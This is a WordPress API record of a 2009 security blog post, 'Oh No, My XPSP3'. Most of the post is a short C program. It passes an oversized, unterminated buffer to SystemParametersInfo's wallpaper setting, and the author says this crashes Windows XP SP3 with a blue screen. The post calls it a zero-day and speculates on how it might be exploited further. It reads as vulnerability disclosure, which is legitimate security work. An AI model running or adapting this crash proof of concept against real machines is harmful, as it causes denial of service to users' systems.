{"id":78,"date":"2009-02-02T06:09:14","date_gmt":"2009-02-02T08:09:14","guid":{"rendered":"http:\/\/www.ragestorm.net\/blogs\/?p=78"},"modified":"2009-09-17T22:35:19","modified_gmt":"2009-09-18T00:35:19","slug":"oh-no-my-xpsp3","status":"publish","type":"post","link":"https:\/\/www.ragestorm.net\/blogs\/?p=78","title":{"rendered":"Oh No, My XPSP3"},"content":{"rendered":"<pre lang=\"c\">#include &lt;windows.h&gt;\r\nint main()\r\n{\r\n    WCHAR c[1000] = {0};\r\n    memset(c, 'c', 1000);\r\n    SystemParametersInfo(SPI_SETDESKWALLPAPER, 0, (PVOID)c, 0);\r\n\r\n    WCHAR b[1000] = {0};\r\n    SystemParametersInfo(SPI_GETDESKWALLPAPER, 1000, (PVOID)b, 0);\r\n    return 0;\r\n}<\/pre>\n<p>Two posts ago I talked about <a href=\"http:\/\/www.ragestorm.net\/blogs\/?p=75\">vulnerabilities<\/a>. So here&#8217;s some Zero Day. This will crash your system, unless you&#8217;re on Vista (which is already immune to it). And why the heck is this thing still not closed on SP3?<\/p>\n<p>It might be exploitable; I didn&#8217;t research it any further than the BSOD of the security cookie&#8230; Maybe on some compilations without \/GS it can be easily exploited. Or maybe overwriting enough of the stack to trigger an exception could be it.<\/p>\n<p><font size=\"1\">&#8220;Remember to let her into your heart,<br \/>\nThen you can start to make it better&#8221; &#8211; The Beatles.<\/font><\/p>\n","protected":false},"excerpt":{"rendered":"<p>#include &lt;windows.h&gt; int main() { \u00a0WCHAR c[1000] = {0}; \u00a0memset(c, &#8216;c&#8217;, 1000); \u00a0SystemParametersInfo(SPI_SETDESKWALLPAPER, 0, (PVOID)c, 0); WCHAR b[1000] = {0}; \u00a0SystemParametersInfo(SPI_GETDESKWALLPAPER, 1000, (PVOID)b, 0); \u00a0return 0; } Two posts ago I talked about vulnerabilities. So here&#8217;s some Zero Day. This will crash your system, unless you&#8217;re on Vista (which is already immune to it). 
And [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"spay_email":"","jetpack_publicize_message":""},"categories":[19,13,17,7],"tags":[],"jetpack_featured_media_url":"","jetpack_publicize_connections":[],"jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/pbWKd-1g","_links":{"self":[{"href":"https:\/\/www.ragestorm.net\/blogs\/index.php?rest_route=\/wp\/v2\/posts\/78"}],"collection":[{"href":"https:\/\/www.ragestorm.net\/blogs\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.ragestorm.net\/blogs\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.ragestorm.net\/blogs\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.ragestorm.net\/blogs\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=78"}],"version-history":[{"count":5,"href":"https:\/\/www.ragestorm.net\/blogs\/index.php?rest_route=\/wp\/v2\/posts\/78\/revisions"}],"predecessor-version":[{"id":100,"href":"https:\/\/www.ragestorm.net\/blogs\/index.php?rest_route=\/wp\/v2\/posts\/78\/revisions\/100"}],"wp:attachment":[{"href":"https:\/\/www.ragestorm.net\/blogs\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=78"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.ragestorm.net\/blogs\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=78"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.ragestorm.net\/blogs\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=78"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}